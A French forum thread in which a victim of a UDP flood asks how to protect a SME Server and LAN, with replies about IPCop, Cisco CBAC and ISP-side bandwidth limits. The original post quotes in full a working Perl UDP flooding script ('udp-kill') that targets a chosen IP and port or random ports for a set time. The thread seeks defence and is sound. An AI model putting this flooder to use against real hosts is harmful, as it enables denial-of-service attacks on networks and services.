Victime d'une DDos attaque

[iphosting]

Bonjour, <BR>J'ai passé une pu*** nuit. Hier soir mon lan a subi une attaque de type DDos, pendant au moins 2heures.Le type de DDos je crois une attaque UDP <BR>voila le script suspect qui fait cette attaque <BR>"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" <BR>$ARGC=@ARGV; <BR> <BR>if ($ARGC !=3) { <BR> printf "$0 <ip> <port> <time>n"; <BR> printf "if arg1/2 =0, randports/continous packets.n"; <BR> exit(1); <BR>} <BR> <BR>my ($ip,$port,$size,$time); <BR> $ip=$ARGV[0]; <BR> $port=$ARGV[1]; <BR> $time=$ARGV[2]; <BR> <BR>socket(crazy, PF_INET, SOCK_DGRAM, 17); <BR> $iaddr = inet_aton("$ip"); <BR> <BR>printf "udp-kill n"; <BR> <BR>if ($ARGV[1] ==0 && $ARGV[2] ==0) { <BR> goto randpackets; <BR>} <BR>if ($ARGV[1] !=0 && $ARGV[2] !=0) { <BR> system("(sleep $time;killall -9 udp) &"); <BR> goto packets; <BR>} <BR>if ($ARGV[1] !=0 && $ARGV[2] ==0) { <BR> goto packets; <BR>} <BR>if ($ARGV[1] ==0 && $ARGV[2] !=0) { <BR> system("(sleep $time;killall -9 udp) &"); <BR> goto randpackets; <BR>} <BR> <BR>packets: <BR>for (;;) { <BR> $size=$rand x $rand x $rand; <BR> send(crazy, 0, $size, sockaddr_in($port, $iaddr)); <BR>} <BR> <BR>randpackets: <BR>for (;;) { <BR> $size=$rand x $rand x $rand; <BR> $port=int(rand 65000) +1; <BR> send(crazy, 0, $size, sockaddr_in($port, $iaddr)); <BR>} <BR> <BR>"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" <BR> <BR> <BR>Le server attaqué n'est que sme 5.2 eh oui e-smith(avec ipchaine) <BR>Bon voila mes questions: <BR>1)que puis-je faire pour remedier a ce probleme ? <BR>2)est-ce qu'un ipcop est mieux que Clarkconnect 1.3 (car hier j'ai installé un et j'ai demandé a un ami de faire une attaque Syn Flood, c'etais vraiment la cata, meme si j'ai fais iptables -A FORWARD -p tcp --syn -m limit --limit 1/s -j ACCEPT <BR>3)j'ai un server de production(web+dns+email) sur une sme5.2, est-ce que de preferable le mettre sur une 5.6 !!? <BR>4)est-ce que c'est preferable de mettre un firewall (ipcop ou clarkconnect 2)avec une red et green pour le lan et le server de production en port forward , sans perdre aucun email ou aucune requete dns, car je fais de la resolution dns pour le lan <BR> <BR>sur mon router cisco j'ai annulé le echo-replay, il me reste que le protection du lan <BR>Je compte sur vous pour me sortir ce pétrin <BR> <BR>Merci

[micheldp]

bonjour, <BR>J'ai un Ipcop avec rouge, orange et vert. <BR>Mes PC's se trouvent en vert, ainsi un serveur sme (5.6) qui me recupère les mails et fait le serveur fichiers. <BR>Sur l'orange (DMZ) se trouve un serveur SME avec le site internet.

[chose]

Si, sur le cisco, il contient un ios firewall, tu peux utilisé les control d'access basé sur le contexte ( CBAC ) type d'acl très efficace... <BR> <BR><!-- BBCode auto-link start --><a href="http://www.cisco.com/en/US/products/sw/iosswrel/ps1831/products_configuration_guide_chapter09186a00800d981a.html#99019" target="_blank">http://www.cisco.com/en/US/products/sw/iosswrel/ps1831/products_configuration_guide_chapter09186a00800d981a.html#99019</a><!-- BBCode auto-link end -->

[archi]

Si l'isp n'est pas impliqué dans la protection je vois pas trop comment tu peux resister à dos. Meme si tu rejetes les paquets tres bas dans les couches , ils arrivent tout de meme chez toi et donc tu n'a plus de bande passante. <BR> <BR>Si par contre ton isp peut decouper la bande passante tu peux lui demander qu'il te laisse la moitié de la bande passante par exemple pour tes services critiques. <BR>Une limite synflood peut aider ainsi qu'un filtrage sur les paquets fragmentés et d'autres choses... <BR> <BR>Ca limite les dégats mais il n'y a pas de parade a moindre cout pour ce type d'attaque.